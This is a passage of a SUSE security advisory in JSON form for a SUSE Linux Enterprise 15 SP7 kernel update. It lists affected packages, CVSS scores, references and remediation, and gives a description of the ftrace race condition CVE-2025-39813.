"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
